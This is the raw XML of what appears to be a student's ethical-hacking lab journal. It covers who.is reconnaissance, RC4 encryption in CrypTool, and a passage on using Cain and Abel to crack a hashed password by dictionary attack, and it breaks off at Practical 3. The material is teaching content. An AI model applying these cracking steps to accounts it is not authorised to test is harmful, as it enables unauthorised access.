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footer8.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.footer+xml"/>
  <Override PartName="/word/footer9.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.footer+xml"/>
  <Default Extension="jpeg" ContentType="image/jpeg"/>
  <Override PartName="/word/footer6.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.footer+xml"/>
  <Override PartName="/word/footer7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90B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="3328"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>PRACTICAL  NO.1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AIM :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A19F9" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Google and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A19F9" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007A19F9" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A19F9" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reconnaisasance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007A19F9" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:spacing w:before="90"/>
        <w:ind w:left="3332" w:right="3507"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Using who.is</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Step1: Open the WHO.is website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25120153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154990</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5935184" cy="3224403"/>
            <wp:effectExtent l="19050" t="0" r="8416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84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  <w:spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="90"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Step 2: Enter the website name and hit the “Enter button”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25120256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161438</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5903629" cy="2166556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629" cy="2166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Default="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRDefault="00D4195F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRPr="00D4195F" w:rsidRDefault="00D4195F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4" w:rsidP="00D4195F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 3: Show you information about </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidRPr="00D4195F">
          <w:rPr>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>www.prestashop.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25120358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577796</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5930366" cy="4811268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366" cy="48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  <w:spacing w:before="5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footerReference w:type="default" r:id="rId12"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="124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390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251204608" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>974020</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>124827</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5807488" cy="7678388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488" cy="7678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  <w:spacing w:before="12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80" w:right="1040" w:bottom="124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390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251205632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>974020</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>104638</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5852735" cy="651729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735" cy="651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  <w:spacing w:before="1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80" w:right="1040" w:bottom="124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390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8316"/>
        </w:tabs>
        <w:spacing w:before="158"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25120665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577796</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5905795" cy="5669184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795" cy="5669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6621" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:tab/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80" w:right="1040" w:bottom="126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390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8316"/>
        </w:tabs>
        <w:spacing w:before="158"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251207680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>969285</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>603367</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5884831" cy="5668137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831" cy="566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6621" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4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CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A913FB" w:rsidRPr="00D4195F" w:rsidRDefault="00A913FB" w:rsidP="00A913FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="3328"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>PRACTICAL  NO</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>. 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00A913FB" w:rsidP="00CD2C75">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1)  Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CryptTool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to encrypt and decrypt passwords using RC4 algorithm.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00A913FB" w:rsidRPr="00D4195F" w:rsidRDefault="00A913FB" w:rsidP="00A913FB">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00D748F9" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6067425" cy="33623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75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using RC4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Encryption using RC4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00D748F9" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6067425" cy="34385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75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A913FB" w:rsidRPr="00D4195F" w:rsidRDefault="00A913FB" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A913FB" w:rsidRPr="00D4195F" w:rsidRDefault="00A913FB" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Decryption</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00D748F9" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6067425" cy="33718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75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00A913FB" w:rsidP="00A913FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.2</w:t>
      </w:r>
      <w:r w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)  Use Cain and Abel for cracking Windows account password using Dictionary attack and to decode wireless network passwords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="3025430"/>
            <wp:effectExtent l="1905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C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Click  on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> HASH </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Calcuator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enter the password to convert into hash</w:t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r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5876925" cy="38671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r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Paste the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>value  into</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the field you have converted </w:t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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MD5)</w:t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r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4943475" cy="10858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r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Right Click on the hash and select the dictionary attack</w:t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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Then  right</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> click on the file and select (Add to List) and then select the Wordlist</w:t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r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6337300" cy="3646805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r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Select all the options and start the dictionary attack</w:t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  <w:sectPr w:rsidR="00030BD3" w:rsidRPr="00D4195F">
          <w:footerReference w:type="default" r:id="rId24"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="1300" w:left="1220" w:header="0" w:footer="88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  <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4124325" cy="37719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75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A913FB" w:rsidRPr="00D4195F" w:rsidRDefault="00A913FB" w:rsidP="00A913FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="2880" w:right="0" w:firstLine="720"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>PRACTICAL NO.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A913FB" w:rsidRPr="00D4195F" w:rsidRDefault="00A913FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="2925" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00C30C54" w:rsidP="00A913FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">3.1) </w:t>
      </w:r>
      <w:r w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
